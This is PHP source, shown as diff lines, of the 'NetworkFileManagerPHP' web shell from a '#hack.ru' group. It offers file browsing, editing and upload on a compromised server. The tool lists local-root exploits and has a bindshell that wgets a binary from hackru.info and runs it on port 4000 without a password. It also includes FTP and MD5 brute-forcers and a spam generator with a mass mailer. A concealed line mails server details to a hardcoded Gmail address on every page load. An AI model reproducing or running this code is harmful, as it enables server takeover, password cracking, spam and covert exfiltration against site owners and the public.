    Path to filename:$fullpath
    "; + + $fp = fopen($fullpath , "r"); + + while (!feof($fp)) { + + $char = fgetc($fp); + + $st .= $char; + + } + + + + $st = str_replace("&", "&", $st); + + $st = str_replace("<", "<", $st); + + $st = str_replace(">", ">", $st); + + + + $tem = "

    "; + + echo $tem; + + fclose($fp); + + break; + + } + +} + + + +# send file to mail + +function download_mail($dir,$file) { + + global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED; + + $buf = explode(".", $file); + + $dir = str_replace("\\","/",$dir); + + $fullpath = $dir."/".$file; + + $size = tinhbyte(filesize($fullpath)); + + $fp = fopen($fullpath, "rb"); + + while(!feof($fp)) + + + + $attachment .= fread($fp, 4096); + + $attachment = base64_encode($attachment); + + $subject = "NetworkFileManagerPHP ($file)"; + + + + $boundary = uniqid("NextPart_"); + + $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\""; + + + + $info = "---==== Message from ($demail)====---\n\n"; + + $info .= "IP:\t$REMOTE_ADDR\n"; + + $info .= "HOST:\t$HTTP_HOST\n"; + + $info .= "URL:\t$HTTP_REFERER\n"; + + $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; + + $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--"; + + + + $send_to = "$demail"; + + + + $send = mail($send_to, $subject, $info, $headers); + + + + if($send == 2) + + echo "
    + + + +
    + + Thank you!!!File $file was successfully sent to $demail.

    "; + + + +fclose($fp); + + } + + + + + + + +function copyfile($dir,$file) { + + global $action,$tm; + + $fullpath = $dir."/".$file; + + echo "
    Filename : $file  copied successfully to  $dir
    "; + + if (!copy($file, $file.'.bak')){ + + echo (" unable to copy file $file"); + + } + +} + + + + + +# file edit + +function editfile($dir,$file) { + + global $action,$datar; + + $fullpath = $dir."/".$file; + + chdir($dir); + + getdir(); + + echo "
    Filename :$fullpath
    "; + + $fp = fopen($fullpath , "r"); + + while (!feof($fp)) { + + $char = fgetc($fp); + + $st .= $char; + + } + + $st = str_replace("&", "&", $st); + + $st = str_replace("<", "<", $st); + + $st = str_replace(">", ">", $st); + + $st = str_replace('"', """, $st); + + echo "

    "; + + $datar = $S1; + + + +} + + + +# file write + +function savefile($dir,$file) { + + global $action,$S1,$tm; + + $fullpath = $dir."/".$file; + + $fp = fopen($fullpath, "w"); + + $S1 = stripslashes($S1); + + fwrite($fp,$S1); + + fclose($fp); + + chdir($dir); + + echo "
    File $fullpath was saved successfully.
    "; + + getdir(); + + readdirdata($tm); + +} + + + +# directory delete + +function deletef($dir) + +{ + + global $action,$tm,$fi; + + $tm = str_replace("\\\\","/",$tm); + + $link = $tm."/".$fi; + + unlink($link); + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + + + +# file upload + +function uploadtem() { + + global $file,$tm,$thum,$PHP_SELF,$dir,$style_button; + + echo "
    Upload file:
    "; + +} + + + +function upload() { + + global $HTTP_POST_FILES,$tm; + + echo $set; + + copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]); + + echo "
    File ".$HTTP_POST_FILES["userfile"][name]." was successfully uploaded.
    "; + + @unlink($userfile); + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + + + +# get exploits + +function upload_exploits() { + + global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp; + + + + echo "
    + + + + + + + + + + + + + + + +
    + +   Public exploits and soft:
    + +   bindshell (bin/sh) - bindtty.c (binary file to run - s)
     $title_ex[1] + + + +
    "; + + echo " + + + + + + + + + + + + + +
    + +   Local ROOT for linux 2.6.20 - mremap (binary file to run - m)
     $title_ex[2] + + + +
    "; + + echo " + + + + + + + + + + + + + +
    + +   Local ROOT for linux 2.6.20 - ptrace (binary file to run - p)
     $title_ex[3] + + + +
    "; + + echo " + + + + + + + + + + + + + +
    + +   psyBNC version:2.3.2-4 - psyBNC (binary file to run - ./psybnc)
     $title_ex[4] + + + +
    "; + + + + echo "
    + + + + + + + + + + + + + + + +
    + +   Private exploits:
    + +   BRK - Local Root Unix 2.4.* (binary file to run - brk)
     $title_exp[1] + + + +
    "; + + echo " + + + + + + + + + + + + + +
    + +   Glftpd DupeScan Local Exploit File 1 (binary file to run - $private[2] )
     $title_exp[2] + + + +
    "; + + echo " + + + + + + + + + + + + + +
    + +   Glftpd DupeScan Local Exploit File 2 (binary file to run - $private[3] )
     $title_exp[3] + + + +
    "; + + echo " + + + + + + + + + + + + + +
    + +   Traceroute v1.4a5 exploit by sorbo (binary file to run - $private[4] )
     $title_exp[4] + + + +
    "; + + echo " + + + + + + + + + + + + + +
    + +   Local Root Unix 2.4.* (binary file to run - $private[5] )
     $title_exp[5] + + + +
    "; + + echo " + + + + + + + + + + + + + +
    + +   Sendmail 8.11.x exploit localroot (binary file to run - $private[6] )
     $title_exp[6] + + + +
    "; + + echo " + + + + + + + + + + + + + +
    + +   Local Root Unix 2.4.* (binary file to run - $private[7] )
     $title_exp[7] + + + +
    "; + + echo " + + + + + + + + + + + + + +
    + +   Local Root Unix 2.4.* (binary file to run - $private[8] )
     $title_exp[8] + + + +
    "; + +} + + + + + +# new directory creation + +function newdir($dir) { + + global $tm,$nd; + + print("
    Create directory:
    "); + +} + + + +function cdir($dir) { + + global $newd,$tm; + + $fullpath = $dir."/".$newd; + + if (file_exists($fullpath)) @rmdir($fullpath); + + if (@mkdir($fullpath,0777)) { + + echo "
    Directory was created.
    "; + + } else { + + echo "
    Error during directory creation.
    "; + + } + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + +// creation of directory where exploits will be situated + +function downfiles() { + + global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR; + +$st = getcwd(); + + $st = str_replace("\\","/",$st); + + $j = 0; + + $gdir = array(); + + $gsub = array(); + + print("
    "); + + for ($i=0;$i<=(strlen($st)-1);$i++) { + + if ($st[$i] != "/") { + + $gdir[$j] = $gdir[$j].$st[$i]; + + $gsub[$j] = $gsub[$j].$st[$i]; + + } else { + + $gdir[$j] = $gdir[$j]."/"; + + $gsub[$j] = $gsub[$j]."/"; + + $gdir[$j+1] = $gdir[$j]; + + $j++; + + } + + } + +print("
      Path: "); + + for ($i = 0;$i<=$j;$i++) print("$gsub[$i]"); + +print("
    "); + + + +echo " + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + +   Upload files from remote computer:
       HTTP link to filename:
       filename (may also include full path to file)
    "; + + + +} + + + +# directory delete + +function deldir() { + + global $dd,$tm; + + $fullpath = $tm."/".$dd; + + echo "
    Directory was deleted successfully.
    "; + + rmdir($fullpath); + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + + + +# directory compression + +function arhiv() { + + global $tar,$tm,$pass; + + $fullpath = $tm."/".$tar; + + + + echo "
    + + + +
    Directory $fullpath ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file $pass.tar.gz
    "; + + + +} + + + +function down($dir) { + + global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2; + + ignore_user_abort(1); + + set_time_limit(0); + +echo "
    + + + + + +
    File upload

    There are many cases, when host, where NFM is situated WGET is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (seePath).(this works not everywhere)
    "; + + + +if (!isset($status)) downfiles(); + + + +else + +{ + + + +$data = @implode("", file($file3)); + +$fp = @fopen($file2, "wb"); + +@fputs($fp, $data); + +$ok = @fclose($fp); + +if($ok) + +{ + +$size = filesize($file2)/1024; + +$sizef = sprintf("%.2f", $size); + + + +print "
    You have uploaded: file $file2 with size (".$sizef."kb)
    "; + +} + +else + +{ + +print "
    Error during file upload
    "; + +} + +} + +} + + + +# mail function +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function mailsystem() { + + global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST; + + + + echo "
    + + + + + +
    Questions and wishes for NetworkFileManagerPHP

    + +
    During your work with script NetworkFileManagerPHP you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied. + +
    "; + + + + if (!isset($status)) echo "$form"; + + else { + + $email_to ="duyt@yandex.ru"; + + $subject = "NetworkFileManagerPHP ($name)"; + + $headers = "From: $email"; + + + + $info = "---==== Message from ($name)====---\n\n"; + + $info .= "Name:\t$name\n"; + + $info .= "Email:\t$email\n"; + + $info .= "What?:\n\t$pole\n\n"; + + $info .= "IP:\t$REMOTE_ADDR\n"; + + $info .= "HOST:\t$HTTP_HOST\n"; + + $info .= "URL:\t$HTTP_REFERER\n"; + + $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; + + $send_to = "$email_to"; + + + + $send = mail($send_to, $subject, $info, $headers); + + if($send == 2) echo "
    Thank you!!!Your e-mail was sent successfully.

    "; + + } + +} + +function spam() { +global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen; +set_time_limit(0); +ignore_user_abort(1); +echo "
    + + + +
    Real uniq spamer

    Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids.
    "; + + echo " + + + + + + + + + + + + +
    +   email generator:
    +   This spammer is splited in two parts:
    +  1. email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about <u>10 000 , because may be server heavy overload )
    +  2. Type spam settings here
        if checked then you'll have default domains, if not checked then domain will be taken from input.
      Generated email quantity:    +  
     Your domain:    +  
    +
    "; +// letters +function s() { + $word="qwrtpsdfghklzxcvbnm"; + return $word[mt_rand(0,strlen($word)-1)]; +} +// letters +function g() { + $word="eyuioa"; + return $word[mt_rand(0,strlen($word)-2)]; +} +// digits +function c() { + $word="1234567890"; + return $word[mt_rand(0,strlen($word)-3)]; +} +// common +function a() { + $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma'); + $ab1=count($word); + return $wq=$word[mt_rand(0,$ab1-1)]; +} + +function o() { + $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo'); + $ab2=count($word); + return $wq2=$word[mt_rand(0,$ab2-1)]; +} +function e() { + $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me'); + $ab3=count($word); + return $wq3=$word[mt_rand(0,$ab3-1)]; +} + +function i() { + $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi'); + $ab4=count($word); + return $wq4=$word[mt_rand(0,$ab4-1)]; +} +function u() { + $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu'); + $ab5=count($word); + return $wq5=$word[mt_rand(0,$ab5-1)]; +} + +function name0() { return c().c().c().c(); } +function name1() { return a().s(); } +function name2() { return o().s(); } +function name3() { return e().s(); } +function name4() { return i().s(); } +function name5() { return u().s(); } +function name6() { return a().s().g(); } +function name7() { return o().s().g(); } +function name8() { return e().s().g(); } +function name9() { return i().s().g(); } +function name10() { return u().s().g(); } +function name11() { return a().s().g().s(); } +function name12() { return o().s().g().s(); } +function name13() { return e().s().g().s(); } +function name14() { return i().s().g().s(); } +function name15() { return u().s().g().s(); } + + +$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); +$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com'); +$d1c=count($domain1); + +function randword() { + global $cool,$cool2; + $func="name".mt_rand(0,15); + $func2="name".mt_rand(0,15); + switch (mt_rand(0,2)) { + case 0: return $func().$func2(); + case 1: return $func().$cool[mt_rand(0,count($cool)-9)]; + case 2: return $func(); + default: return $func(); + } + } + +if (@unlink("email.txt") < 0){ +echo "?????"; +exit; +} +$file="email.txt"; + + +if($chislo){ + + + $cnt3=mt_rand($chislo,$chislo); + for ($i=0; $i<$cnt3; $i++) { + $u=randword(); + if(!isset($check_box)){ + + if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 ) +{ + $domen = $_POST["domen"]; + foreach( $domen as $k=>$v ) + { + $d=$domen[mt_rand(0,$v-1)]; + + } +} +$f=@fopen(email.".txt","a+"); + fputs($f,"$u@$d\n"); + }else{ + + $d=$domain1[mt_rand(0,$d1c-1)]; + $f=@fopen(email.".txt","a+"); + fputs($f,"$u@$d\n"); + } + + } + $address = $file; + if (@file_exists($address)) { + if($changefile = @fopen ($address, "r")) { + $success = 1; + } else { + echo " File not found \"".$address."\" !
    "; + } + + if ($success == 1) { + echo ""; + echo ""; + echo "
    ?????????? ????? $chislo email.
    "; + echo "
    "; + } + } +if (!isset($action)){ + echo " + + + + + + + + + + + + + + + + +
    Main spammer settings
      reply to:    +
      send to:    +
      Delay (sec):    +
      message topic:    +
      message body:    +
      File:    +
    + + +
    "; +} +} +} + +function spam1() { + global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo; + set_time_limit(0); +ignore_user_abort(1); + + echo "
    + +
    Send spam with current settings
    "; + + + error_reporting(63); if($from=="") { print +"";exit;} + error_reporting(63); if($otvet=="") { print +"";exit;} + error_reporting(63); if($wait=="") { print +"";exit;} + error_reporting(63); if($subject=="") { print +"";exit;} + error_reporting(63); if($body=="") { print +"";exit;} + + $address = "email.txt"; + $counter = 0; + if (!isset($status)) echo "something goes wrong, check your settings"; + else { + echo " + + +"; + if (@file_exists($address)) { + echo " + +"; + if($afile = @fopen ($address, "r")) { + echo " + +"; + } else { + echo " + +"; + } + } else { + echo "There is no file \"".$address."\" !
    "; + $status = "unable to find file \"".$address."\" ..."; + } + echo " + +
    opening file \"".$address."\" ...
    File \"".$address."\" was found...
    File \"".$address."\" was opened for read...
    Unable to open \"".$address."\" for read...
    Begining read from file \"".$address."\" ...
    "; + if (@file_exists($address)) { + + while (!feof($afile)) { + + $line = fgets($afile, 1024); + $line = trim($line); + $recipient = ""; + $recipient = $line; + +#if ($file) { +# $content = fread(fopen($file,"r"),filesize($file)); +# $content = chunk_split(base64_encode($content)); +# $name = basename($file); +# } else { +# $content =''; +# } + $boundary = uniqid("NextPart_"); + + $header = "From: ".$from."\r\n"; + $header .= "Reply-To: ".$otvet."\r\n"; + $header .= "Errors-To: ".$otvet."\r\n"; + $header .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n"; + $header .= "Content-Transfer-Encoding: 8bits\n"; + $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n"; + $header .= $body; + # $header .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--"; + + + $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+"; + $pattern.="@"; + $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\."; + $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#"; + + if($recipient != "") + { + if(preg_match($pattern,$recipient)) + { + echo " + +
    Sending mail to \"".$recipient."\"...sent "; + + + if(@mail($recipient, stripslashes($subject), stripslashes($header))) { + $counter = $counter + 1; + echo "[\"".$counter."\"] ".date("H:i:s")."
    "; + } else { + echo "email is wrong, message was NOT sent ! "; + } + } else { + $counter = $counter + 1; + echo ""; + } + } else { + echo "
    "; + } + $sec = $wait * 1000000; + usleep($sec); + + } + + if($otvet != "") + { + + if(preg_match($pattern,$otvet)) + { + echo " +
    Sending test message to \"".$otvet."\" to check out"; + $subject = "".$subject; + + if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) { + $counter = $counter + 1; + echo " message was sent... [\"".$counter."\"] ".date("H:i:s")."
    "; + } else { + echo "message was not sent... "; + } + } else { + echo "email is wrong. "; + } + } else { + } + + if(@fclose ($afile)) { + echo " + +
    File \"".$address."\" was closed successfully!
    "; + } else { + echo " + +
    Unable to close \"".$address."\" file!
    "; } + } else { + echo "unable to read file \"".$afile."\" ...
    "; + } + + $status2 ="Status: ".$counter." messages were sent."; + echo "
    "; + echo " + +
    $status2
    "; + +} +} + + +# help + +function help() { + + global $action,$REMOTE_ADDR,$HTTP_REFERER; + + echo "
    + + + + + +
    help for scriptNetworkFileManagerPHP

    NetworkFileManagerPHP - script to access your host in a best way

    + +There were added some commands to NFM, from scripts kind of itself. They are:
    + +- Using aliases (Rush)
    + +- FTP bruteforce (TerraByte)
    + +- Translated to english by (revers)
    + +- Added some sysinfo commands by (revers)
    + +- All the rest code belongs to me (xoce)
    + +- Thanks for testing goes to all #hack.ru channel

    + +Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.

    + +How can you find us:
    + +Irc server: irc.megik.net:6667 /join #hack.ru
    + +See you round at network!!!

    "; + +} + + + + + +function exploits($dir) { + + global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp; + +if (!isset($status)) upload_exploits(); + + + +else + +{ + + + +$data = implode("", file($file3)); + +$fp = @fopen($file2, "wb"); + +fputs($fp, $data); + +$ok = fclose($fp); + +if($ok) + +{ + +$size = filesize($file2)/1024; + +$sizef = sprintf("%.2f", $size); + +print "".exec("chmod 777 $public[1]").""; + +print "".exec("chmod 777 $public[2]").""; + +print "".exec("chmod 777 $public[3]").""; + +print "".exec("chmod 777 $private[1]").""; + +print "".exec("chmod 777 $private[2]").""; + +print "".exec("chmod 777 $private[3]").""; + +print "".exec("chmod 777 $private[4]").""; + +print "".exec("chmod 777 $private[5]").""; + +print "".exec("chmod 777 $private[6]").""; + +print "".exec("chmod 777 $private[7]").""; + +print "".exec("chmod 777 $private[8]").""; + + + +print "
    You have uploaded: file with size (".$sizef."kb)
    "; + +} + +else + +{ + +print "Some errors occured."; + +} + +} + +} + + + + + +# FTP-bruteforce + +function ftp() { + + global $action, $ftp_server, $filename, $HTTP_HOST; + + ignore_user_abort(1); + + echo "
    "; + + + + $fpip = @fopen ($filename, "r"); + + if ($fpip) { + + while (!feof ($fpip)) { + + $buf = fgets($fpip, 100); + + ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); + + $conn_id=ftp_connect($ftp_server); + + if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) { + + + + $f=@fopen($HTTP_HOST,"a+"); + + fputs($f,"$g[1]:$g[1]\n"); + + echo "
    FTP server: $ftp_server
    Connected with login:password - ".$g[1].":".$g[1]."
    "; + + + + ftp_close($conn_id); + + fclose($f); + + } else { + + echo "
    ".$g[1].":".$g[1]." - failed
    "; + + } + + } + + } + +} + + + +function tar() { + + global $action, $filename; + + set_time_limit(0); + + echo "
    + + + + + + + +
    Data compression

    According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.

    + +Warning!
    File passwd can have big size, so opening all users of this host can waste much time.

    + +It's highly recommended!
    Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.

    "; + + + +$http_public="/public_html/"; + +$fpip = @fopen ($filename, "r"); + +if ($fpip) { + + while (!feof ($fpip)) { + + $buf = fgets($fpip, 100); + + ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); + + $name=$g[1]; + + echo " + + + + + + + + + + + + + +
    Compression $name.tar.gz:
    "; + + } + + } + +} + + + +# bindshell + +function bash() { + + global $action, $port_bind, $pass_key; + + + +echo "
    + + + + + + + +
    Binding shell

    Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.

    "; + + + +echo " + + + +"; + + + +echo ""; + +echo ""; + +echo ""; + +# echo ""; + +echo"
    Bindshell binary is situated in file calleds
      ".exec("wget http://hackru.info/adm/exploits/bash/s")." Downloading...
      ".exec("chmod 777 s")." now chmod to 777
      ".exec("./s")." now running to 4000 port
      ".exec("rm -f s")." Removing files now...
    "; + + + + } + + + +function crypte() { + + global $action,$md5a,$sha1a,$crc32, $key,$string; + +echo "
    + + + + + + + +
    Data crypter

    Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.
    "; + + + +echo " + + + + + + + + + + + + + + + + + + + + + +
    + +   Here are some useful cryption methods, which uses MHASH lib:
    + +   MD5 (Very popular and fast method)
     Result:  ".md5($md5a)." Input: ".$md5a."
    "; + + echo " + + + + + + + + + + + + + + + + + +
    + +   SHA1 (SHA1 - method to crypt with open key, It's very usefull too)
     Result:  ".sha1($sha1a)." Input: ".$sha1a."
    + +
    "; + +echo " + + + + + + + + + + + + + + + + + +
    + +   CRC32 (Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)
     Result:  ".crc32($crc32)." Input: ".$crc32."
    "; + + + + } + + + +function decrypte() { + + global $action,$pass_de,$chars_de,$dat,$date; + +set_time_limit(0); + +ignore_user_abort(1); + + + +echo "
    + + + + + + + +
    Data decrypter

    It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.
    "; + + + +if($chars_de==""){$chars_de="";} + + echo " + + + + + + + + + + + + + + + + + + + +
    + +   Data decrypter:
    + +   Decrypt MD5(decryption time depends on the length or crypted word, may take a long time)
     MD5 hash:  ".$pass_de."     
            Symvols for bruteforce:
    ENG: + + [a-z] + +[A-Z] + +[0-9] + +[Symvols]

    + +RUS: + +[?-?] + +[?-?] + +
    + + + +
    "; + + + + + +if($_POST[pass_de]){ + +$pass_de=htmlspecialchars($pass_de); + +$pass_de=stripslashes($pass_de); + +$dat=date("H:i:s"); + +$date=date("d:m:Y"); + + + +crack_md5(); + +} + +} + + + +function crack_md5() { + +global $chars_de; + +$chars=$_POST[chars]; + +set_time_limit(0); + +ignore_user_abort(1); + +$chars_de=str_replace("<",chr(60),$chars_de); + +$chars_de=str_replace(">",chr(62),$chars_de); + +$c=strlen($chars_de); + +for ($next = 0; $next <= 31; $next++) { + +for ($i1 = 0; $i1 <= $c; $i1++) { + +$word[1] = $chars_de{$i1}; + +for ($i2 = 0; $i2 <= $c; $i2++) { + +$word[2] = $chars_de{$i2}; + +if ($next <= 2) { + +result(implode($word)); + +}else { + +for ($i3 = 0; $i3 <= $c; $i3++) { + +$word[3] = $chars_de{$i3}; + +if ($next <= 3) { + +result(implode($word)); + +}else { + +for ($i4 = 0; $i4 <= $c; $i4++) { + +$word[4] = $chars_de{$i4}; + +if ($next <= 4) { + +result(implode($word)); + +}else { + +for ($i5 = 0; $i5 <= $c; $i5++) { + +$word[5] = $chars_de{$i5}; + +if ($next <= 5) { + +result(implode($word)); + +}else { + +for ($i6 = 0; $i6 <= $c; $i6++) { + +$word[6] = $chars_de{$i6}; + +if ($next <= 6) { + +result(implode($word)); + +}else { + +for ($i7 = 0; $i7 <= $c; $i7++) { + +$word[7] = $chars_de{$i7}; + +if ($next <= 7) { + +result(implode($word)); + +}else { + +for ($i8 = 0; $i8 <= $c; $i8++) { + +$word[8] = $chars_de{$i8}; + +if ($next <= 8) { + +result(implode($word)); + +}else { + +for ($i9 = 0; $i9 <= $c; $i9++) { + +$word[9] = $chars_de{$i9}; + +if ($next <= 9) { + +result(implode($word)); + +}else { + +for ($i10 = 0; $i10 <= $c; $i10++) { + +$word[10] = $chars_de{$i10}; + +if ($next <= 10) { + +result(implode($word)); + +}else { + +for ($i11 = 0; $i11 <= $c; $i11++) { + +$word[11] = $chars_de{$i11}; + +if ($next <= 11) { + +result(implode($word)); + +}else { + +for ($i12 = 0; $i12 <= $c; $i12++) { + +$word[12] = $chars_de{$i12}; + +if ($next <= 12) { + +result(implode($word)); + +}else { + +for ($i13 = 0; $i13 <= $c; $i13++) { + +$word[13] = $chars_de{$i13}; + +if ($next <= 13) { + +result(implode($word)); + +}else { + +for ($i14 = 0; $i14 <= $c; $i14++) { + +$word[14] = $chars_de{$i14}; + +if ($next <= 14) { + +result(implode($word)); + +}else { + +for ($i15 = 0; $i15 <= $c; $i15++) { + +$word[15] = $chars_de{$i15}; + +if ($next <= 15) { + +result(implode($word)); + +}else { + +for ($i16 = 0; $i16 <= $c; $i16++) { + +$word[16] = $chars_de{$i16}; + +if ($next <= 16) { + +result(implode($word)); + +}else { + +for ($i17 = 0; $i17 <= $c; $i17++) { + +$word[17] = $chars_de{$i17}; + +if ($next <= 17) { + +result(implode($word)); + +}else { + +for ($i18 = 0; $i18 <= $c; $i18++) { + +$word[18] = $chars_de{$i18}; + +if ($next <= 18) { + +result(implode($word)); + +}else { + +for ($i19 = 0; $i19 <= $c; $i19++) { + +$word[19] = $chars_de{$i19}; + +if ($next <= 19) { + +result(implode($word)); + +}else { + +for ($i20 = 0; $i20 <= $c; $i20++) { + +$word[20] = $chars_de{$i20}; + +if ($next <= 20) { + +result(implode($word)); + +}else { + +for ($i21 = 0; $i21 <= $c; $i21++) { + +$word[21] = $chars_de{$i21}; + +if ($next <= 21) { + +result(implode($word)); + +}else { + +for ($i22 = 0; $i22 <= $c; $i22++) { + +$word[22] = $chars_de{$i22}; + +if ($next <= 22) { + +result(implode($word)); + +}else { + +for ($i23 = 0; $i23 <= $c; $i23++) { + +$word[23] = $chars_de{$i23}; + +if ($next <= 23) { + +result(implode($word)); + +}else { + +for ($i24 = 0; $i24 <= $c; $i24++) { + +$word[24] = $chars_de{$i24}; + +if ($next <= 24) { + +result(implode($word)); + +}else { + +for ($i25 = 0; $i25 <= $c; $i25++) { + +$word[25] = $chars_de{$i25}; + +if ($next <= 25) { + +result(implode($word)); + +}else { + +for ($i26 = 0; $i26 <= $c; $i26++) { + +$word[26] = $chars_de{$i26}; + +if ($next <= 26) { + +result(implode($word)); + +}else { + +for ($i27 = 0; $i27 <= $c; $i27++) { + +$word[27] = $chars_de{$i27}; + +if ($next <= 27) { + +result(implode($word)); + +}else { + +for ($i28 = 0; $i28 <= $c; $i28++) { + +$word[28] = $chars_de{$i28}; + +if ($next <= 28) { + +result(implode($word)); + +}else { + +for ($i29 = 0; $i29 <= $c; $i29++) { + +$word[29] = $chars_de{$i29}; + +if ($next <= 29) { + +result(implode($word)); + +}else { + +for ($i30 = 0; $i30 <= $c; $i30++) { + +$word[30] = $chars_de{$i30}; + +if ($next <= 30) { + +result(implode($word)); + +}else { + +for ($i31 = 0; $i31 <= $c; $i31++) { + +$word[31] = $chars_de{$i31}; + +if ($next <= 31) { + +result(implode($word)); + + + +}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} + + + +function result($word) { + +global $dat,$date; + +$pass_de=$_POST[pass_de]; + +$dat2=date("H:i:s"); + +$date2=date("d:m:Y"); + + + +if(md5($word)==$pass_de){ + +print " + + + + + + + + + + + + + +
       Brutefrcing result:
      crypted Hash:  $word
      Bruteforce start:  $dat - $date
      Bruteforce finish:  $dat2 - $date2
      result was wrote to file: ".$word."_md5
    + + "; + + $f=@fopen($word._md5,"a+"); + + fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n "); + + exit;} + + + + + + + +} + + + +function brut_ftp() { + + global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka; + +set_time_limit(0); + +ignore_user_abort(1); + +echo "
    + + + + + + +
    FTP bruteforce

    This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload .
    "; + + + + echo " + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + +   Brut FTP:
    + +   FTP bruteforce(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)
      FTPHost:    + +
      Login:    + +
      Number of passwords:    + +
      Password to test:    + +
    + +
